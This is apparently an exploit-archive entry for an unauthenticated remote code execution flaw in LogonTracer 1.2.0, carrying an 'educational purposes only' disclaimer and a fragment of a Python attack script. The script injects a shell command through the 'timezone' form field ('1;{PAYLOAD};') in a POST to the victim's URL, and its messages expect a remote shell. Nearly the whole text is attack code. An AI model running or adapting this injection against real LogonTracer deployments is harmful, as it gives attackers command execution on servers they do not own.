Exploits / Vulnerability Discovered : 2021-06-01 |
Type : webapps |
Platform : multiple
This exploit / vulnerability Logontracer 1.2.0 remote code execution (unauthenticated) is for educational purposes only and if it is used you will do on your own risk!
DATA = {
"logtype": "XML",
"timezone": f"1;{PAYLOAD};",
}
print("[!] Sending request... If your terminal hangs, you might have a shell!")
requests.post(f"{VICTIM_URL}{VICTIM_ENDPOINT}", data=DATA)
print("[*] Done. Did you get what you wanted?")